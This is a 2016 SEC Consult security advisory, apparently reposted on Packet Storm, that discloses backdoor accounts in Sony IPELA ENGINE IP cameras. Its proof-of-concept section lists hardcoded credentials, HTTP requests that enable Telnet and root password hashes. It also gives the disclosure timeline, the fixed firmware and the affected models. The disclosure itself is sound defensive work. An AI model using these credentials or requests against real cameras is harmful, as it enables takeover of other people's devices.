what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sony IPELA ENGINE IP Cameras Backdoor Accounts

Sony IPELA ENGINE IP Cameras Backdoor Accounts
Posted Dec 6, 2016
Authored by Stefan Viehboeck | Site sec-consult.com

Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other functionality, allow an attacker to enable the Telnet/SSH service for remote administration over the network. Other available functionality may have undesired effects to the camera image quality or other camera functionality. After enabling Telnet/SSH, another backdoor allows an attacker to gain access to a Linux shell with root privileges.

tags | exploit, remote, shell, root
systems | linux
SHA-256 | 22e3af92e387283941072a466bbafa59aa472e2642354166a328c50464384720

Sony IPELA ENGINE IP Cameras Backdoor Accounts

Change Mirror Download
We have published an accompanying blog post to this technical advisory with
further information:
http://blog.sec-consult.com/2016/12/backdoor-in-sony-ipela-engine-ip-cameras.html


SEC Consult Vulnerability Lab Security Advisory < 20161206-0 >
=======================================================================
title: Backdoor vulnerability
product: Sony IPELA ENGINE IP Cameras
(multiple products, see Vulnerable / tested versions below)
vulnerable version: see Vulnerable / tested versions below
fixed version: see Vulnerable / tested versions below
CVE number: -
impact: Critical
homepage: https://pro.sony.com/bbsc/ssr/mkt-security/
found: 2016-10-08
by: Stefan ViehbAPck (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Sony Professional Solutions (SPS) is a subsidiary of Japanese multinational
technology and media conglomerate Sony with main focus on professional
products. These range from broadcast software and video cameras to providing
Outside Broadcast Units and professional displays."

Source: https://en.wikipedia.org/wiki/Sony_Professional_Solutions


Business recommendation:
------------------------
Attackers are able to completely takeover the Sony IPELA ENGINE IP Camera
products over the network.

Sony has provided updated firmware which should be installed immediately.

SEC Consult recommends Sony and Sony customers to conduct a thorough
security review of the affected products.

It is essential to restrict access to IP cameras using VLANs, firewalls
etc. Otherwise the risk of being a botnet victim (e.g. Mirai) is high.


Vulnerability overview/description:
-----------------------------------
Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other
functionality, allow an attacker to enable the Telnet/SSH service for
remote administration over the network.

Other available functionality may have undesired effects to the camera
image quality or other camera functionality.

After enabling Telnet/SSH, another backdoor allows an attacker to gain
access to a Linux shell with root privileges!

The vulnerabilities are exploitable in the default configuration over the
network. Exploitation over the Internet is possible, if the web interface
of the device is exposed.


Proof of concept:
-----------------
The following application-level backdoor accounts exist:
- User debug, Passwort: popeyeConnection
- User primana, Passwort: primana

These accounts are allowed to access specific, undocumented CGI functionality!

Enabling Telnet:
Execute the following HTTP requests. Afterwards the Telnet service is running
(TCP port 23). The following command is for Gen5 products, verified on SNC-DH160:

http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

Note: This request may look a bit different for Gen6 cameras, the string
"himitunokagi" (Japanese, translated: "secret key") is involved in the HTTP
request processing. On Gen6 cameras, a SSH daemon exists and can be enabled as
well.

Furthermore an OS-level backdoor exists. This backdoor allows an attacker to
login via Telnet/SSH and access the Linux shell with root privileges!

Below are the password hashes for the OS-level backdoor user:

root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

Note: The backdoor accounts likely allow an attacker with physical access to
the hardware to login via the serial port as well.


Vulnerable / tested versions:
-----------------------------
This vulnerability was verified on a SNC-DH160 camera with firmware
version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).

The same vulnerabilities were found in firmware for Gen6 cameras
V2.7.0 (snc-g6-series-v2-7-0.zip) during automated firmware analysis with
SEC Technologies IoT Inspector.

According to Sony, at least the following products are affected:

SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER585H, SNC-ZP550, SNC-ZR550

SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C

SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,
SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,
SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,
SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,
SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,
SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,
SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,
SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,
SNC-WR602CL


Vendor contact timeline:
------------------------
2016-10-11: Contacting vendor through Sony Prime Support,
asking for product security contact.
2016-10-11: Response from Product Manager - Video Security.
2016-10-14: Vendor sets up secure document exchange.
2016-10-14: Uploading security advisory.
2016-10-14: Vendor confirms receipt of security advisory.
2016-10-24: Asking for update.
2016-11-08: Asking for update again.
2016-11-08: Vendor: advisory information has been sent to HQ Japan,
they are already working on it.
2016-11-28: Sony releases updated firmware and informs SEC Consult.
2016-11-30: Asking Sony additional questions regarding the vulnerability
(no answer).
2016-11-30: Informing CERT-Bund and CERT.at.
2016-12-01: CERT-Bund informs FIRST (Forum of Incident Response and
Security Teams).
2016-12-06: Public release of security advisory.


Solution:
---------
The vendor provided the following URL to download firmware updates for the
affected devices. Updates should be installed immediately:

https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras

The Sony "SNC Tool Box" can be used to confirm the current firmware version and
update the device:
https://pro.sony.com/bbsc/ssr/mkt-security/resource.downloads.bbsccms-assets-cat-camsec-downloads-SecurityDownloadsIPCameraTools.shtml


Workaround:
-----------
None available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan ViehbAPck / @2016

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close